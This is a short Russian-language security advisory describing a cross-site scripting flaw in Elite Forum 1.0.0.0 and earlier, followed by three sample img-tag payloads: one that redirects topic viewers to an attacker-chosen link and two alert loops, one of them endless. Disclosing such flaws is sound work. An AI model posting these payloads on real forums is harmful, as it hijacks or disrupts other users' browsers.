Программа: Elite Forum 1.0.0.0 и более ранние версии

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
обнаружена при обработке входных данных.
Удаленный пользователь может создать
специально сформированное сообщение и
выполнить произвольный HTML код в браузере
жертвы в контексте безопасности уязвимого
сайта.

Пример:

< img src="javascript:void(window.location=('imagelink'))"> -
Replace the imagelink with the link to the image you want to redirect the users
viewing the topic containing this code.

<img src="javascript:a=100;while(a>=0){alert(a);a--}">

<img src="javascript:a=1;while(a>0){alert("sup?")">

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии